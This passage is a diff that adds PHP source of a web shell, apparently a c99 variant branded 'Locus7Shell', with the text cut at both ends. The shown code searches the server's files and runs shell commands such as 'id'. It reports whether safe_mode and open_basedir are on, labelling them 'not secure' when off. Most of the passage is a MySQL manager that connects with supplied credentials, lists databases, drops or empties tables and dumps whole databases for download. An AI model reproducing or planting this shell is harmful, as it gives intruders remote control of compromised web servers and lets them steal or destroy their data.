+ foreach($arr as $k=>$v)
+ {
+ if (strtoupper($v) == "LIMIT")
+ {
+ $result["limit"] = $arr[$k+1];
+ $result["limit"] = explode(",",$result["limit"]);
+ if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+ unset($arr[$k],$arr[$k+1]);
+ }
+ }
+ }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+ if($f != "." && $f != "..")
+ {
+ $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+ if (is_dir($d.$f))
+ {
+ $search_i_d++;
+ if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+ if (!is_link($d.$f)) {c99fsearch($d.$f);}
+ }
+ else
+ {
+ $search_i_f++;
+ if ($bool)
+ {
+ if (!empty($a["text"]))
+ {
+ $r = @file_get_contents($d.$f);
+ if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." 
";}
+ if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+ if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+ else {$bool = strpos(" ".$r,$a["text"],1);}
+ if ($a["text_not"]) {$bool = !$bool;}
+ if ($bool) {$found[] = $d.$f; $found_f++;}
+ }
+ else {$found[] = $d.$f; $found_f++;}
+ }
+ }
+ }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+ $v = @ob_get_contents();
+ @ob_end_clean();
+ @ob_start("ob_gzHandler");
+ echo $v;
+ @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if 
(empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; 
background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src="http://img244.imageshack.us/img244/6663/locus7sgm8.jpg"></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php 
echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+ $t.= $r.DIRECTORY_SEPARATOR;
+ if ($j == $i) {break;}
+ $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." 
(".$free_percent."%)</b>";
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+ $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+ if (!$bool) {$bool = is_dir($letter.":\\");}
+ if ($bool)
+ {
+ $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+ if ($letter.":" != $v) {$letters .= $letter;}
+ else {$letters .= "<font color=green>".$letter."</font>";}
+ $letters .= " ]</a> ";
+ }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+ $item[1] = str_replace("%d",urlencode($d),$item[1]);
+ $item[1] = str_replace("%sort",$sort,$item[1]);
+ $v = realpath($d."..");
+ if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+ $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+ echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act 
== "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+ $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+ $err = mysql_smarterror();
+ @mysql_select_db($sql_db,$sql_sock);
+ if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+ if (!$sql_server) {echo "NO CONNECTION";}
+ else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+ $sqlquicklaunch = array();
+ $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+ $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+ $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+ $sqlquicklaunch[] = array("Server 
variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+ $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+ $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+ if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+ echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" 
value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+ //Start left panel
+ if (!empty($sql_db))
+ {
+ ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+ $result = mysql_list_tables($sql_db);
+ if (!$result) {echo mysql_smarterror();}
+ else
+ {
+ echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+ }
+ }
+ else
+ {
+ ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+ $result = mysql_list_dbs($sql_sock);
+ if (!$result) {echo mysql_smarterror();}
+ else
+ {
+ ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+ $c = 0;
+ $dbs = "";
+ while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= 
">".$row[0]."</option>"; $c++;}
+ echo "<option value=\"\">Databases (".$c.")</option>";
+ echo $dbs;
+ }
+ ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+ }
+ //End left panel
+ echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+ //Start center panel
+ $diplay = TRUE;
+ if ($sql_db)
+ {
+ if (!is_numeric($c)) {$c = 0;}
+ if ($c == 0) {$c = "no";}
+ echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+ if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+ echo "</b></center>";
+ $acts = array("","dump");
+ if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+ elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+ elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+ elseif ($sql_act == "deleterow") {$sql_query = ""; if 
(!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." 
LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" 
name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input 
type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! 
Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." 
